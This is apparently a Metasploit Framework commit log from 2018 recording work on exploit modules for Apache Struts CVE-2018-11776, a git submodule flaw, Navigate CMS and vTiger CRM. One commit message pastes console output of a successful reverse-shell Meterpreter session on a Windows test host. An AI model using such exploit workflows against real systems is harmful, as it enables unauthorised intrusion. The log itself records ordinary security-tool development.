290d4428c1
create git mixin
2018-10-18 11:31:31 +08:00
063e477ff2
git submodule url exec (CVE-2018-17456)
2018-10-18 11:02:28 +08:00
5b14d94957
Land #10671 , struts2_namespace_ognl updates
...
There are still some outstanding concerns, but I want to unblock this.
2018-10-12 11:08:33 -05:00
2989507b85
Copy check for data_header to avoid crash
...
Variable was used but out of scope.
2018-10-12 11:06:26 -05:00
1da99c8bd1
Fixed syntax errors
...
Corrected redundant returns and indentation errors
2018-10-11 10:01:47 -04:00
86f7c270c6
Fixed stylistic and syntax errors
2018-10-11 09:19:35 -04:00
0f3917f540
Fixed syntax errors
2018-10-10 13:26:49 -04:00
26482ee6d6
Fixed EOL spaces
2018-10-09 18:30:41 -04:00
9c9cd33c34
Fixed syntax errors and inconsistencies
2018-10-09 17:45:02 -04:00
8b955f8ec5
Land #10704 , Navigate CMS Unauthenticated RCE
2018-10-04 06:44:21 -05:00
97729727d8
Minor modifications
2018-10-02 06:57:04 -05:00
6f5a8f8f42
Fix outdated metadata
2018-10-01 18:59:09 +01:00
e4256f4595
Make ENABLE_STATIC an OptBool, as I should have done in the first place
2018-09-27 17:54:22 -05:00
342cfe4199
Refactor again
2018-09-27 12:38:05 +02:00
82b1f40925
Add cleanup code
2018-09-27 11:17:53 +02:00
2b86297138
Refactor
2018-09-27 11:16:54 +02:00
f55483d17d
Fix incorrect session_id extraction
2018-09-27 11:07:43 +02:00
f882c3aec2
Add Navigate CMS Unauthenticated Remote Code Execution
2018-09-26 21:39:15 +02:00
fd8ad6f4d8
struts2_namespace_ognl: Added verbose messages for errors with Tomcat >= 7.0.88
2018-09-18 15:26:28 -05:00
4933f47ac5
struts2_namespace_ognl: Remove debugging code
2018-09-18 14:46:41 -05:00
a9e6257891
struts2_namespace_ognl multishot OGNL payloads for Windows Meterpreter support
2018-09-18 14:27:47 -05:00
6126a627cc
Land #10570 , AKA Metadata Refactor
2018-09-17 22:29:20 -05:00
011c25ed59
Merge changes from master (ghostscript)
2018-09-17 13:57:28 -05:00
4c036e70c1
Fix http://seclists.org links to https://
...
I have no idea how this happened in my own code. I was seeing https://.
2018-09-15 18:54:45 -05:00
718aaca0f4
Land #10546 , Add Apache Struts exploit: CVE-2018-11776
2018-09-07 14:54:23 -05:00
bd50e00ccc
Make some small changes:
...
Changes made:
* DisclosureDate
* Privileged to false
* Remove gsub for ';'
* Set cmd/unix/generic as the default payload for ARCH_CMD (linux)
2018-09-07 14:48:33 -05:00
99ca6cef49
Quote-block cleanup and improved error handling
2018-09-07 11:43:04 -05:00
3671f8f6b0
Handling for Tomcat namespace issues, 'allowStaticMethodAccess' settings, and payload output
...
Depending on the configuration of the Tomcat server, `allowStaticMethodAccess` may already be set. We now try to detect this as part of `profile_target`. But that check might fail. If so, we'll try our best and let the user control whether we prepend OGNL to enable `allowStaticMethodAccess` via the 'ENABLE_OGNL' option.
Additionally, sometimes enabling `allowStaticMethodAccess` will cause the OGNL query to fail.
Additionally additionally, some Tomcat configurations won't provide output from the payload. We'll detect that the payload ran successfully, but tell the user there was no output.
2018-09-06 17:56:42 -05:00
7eb06b4592
Address travis errors: Updated metadata and target OS logic
2018-09-06 12:43:56 -05:00
cb16f812ec
struts2_namespace_ognl updates from code review
...
Thanks to @wvu, @firefart, and @wchen!
2018-09-06 11:50:57 -05:00
eb17d9b198
Refactor AKA references for modules
2018-08-31 16:56:05 -05:00
8fe8bf62e3
Renamed to match existing struts2_content_type_ognl and improved comments
2018-08-31 13:48:22 -05:00
35022d8332
Added payload upload+execution and OGNL-specific URI encoding
2018-08-31 13:39:42 -05:00
7c7f63df45
Fix missing normalize_uri in struts2_rest_xstream
...
I missed this one previously. May not be necessary but nice to have.
2018-08-30 15:56:43 -05:00
b373dcc5d4
First draft of module and documentation for struts_namespace_rce against CVE-2018-11776
2018-08-28 16:53:26 -05:00
f6b868bac2
Prefer regex for target check in exploit method
...
This is how I initially wrote it out, and I think I like it better.
Obviously we'll still check individual symbols in execute_command, since
some of the matching is disjoint.
2018-08-28 15:56:45 -05:00
3dec79da23
Add Windows ARCH_CMD target and refactor again
...
Must have been an oversight that I didn't add the target.
2018-08-28 15:03:41 -05:00
7d21c2094e
Improve PSH target and refactor check code
2018-08-27 20:18:35 -05:00
df5f4caaae
Uncomment PSH target in struts2_rest_xstream
...
I'm full of shit. It works.
msf5 exploit(multi/http/struts2_rest_xstream) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500
meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer : MSEDGEWIN10
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows
meterpreter >
2018-08-27 20:01:00 -05:00
47ca6c6a14
Land #10527 , Fix msftdiy EDB link check, enable HTTPS
2018-08-27 10:49:20 -05:00
79b3e4564a
Land #10487 , add php5 session file target
2018-08-27 06:22:28 -05:00
9725e90ba7
Fix msftdiy EDB link check
2018-08-26 04:18:38 +00:00
7f3824b067
Additional path for Linux target
2018-08-24 07:18:24 -05:00
3d0d8f7773
Update false negatives on post auth information
2018-08-20 15:43:07 -05:00
b9809d9435
Added support for php5 as target
...
location of the session file in php5 is /var/lib/php5/sess_file
2018-08-20 03:47:04 +05:30
d9fc99ec4a
Correct false negative post_auth? status
2018-08-09 23:34:03 -05:00
6223685c37
Update auth requirement for json metadata
2018-08-07 16:42:00 -05:00
6c11d5800f
Register files on same line
2018-07-31 10:03:59 -05:00
569ddd9d59
Remove files from application
2018-07-31 09:47:39 -05:00
952ab801e8
Land #10060 , vTiger CRM v6.3.0 Upload RCE
2018-07-30 12:32:24 -05:00
Tim W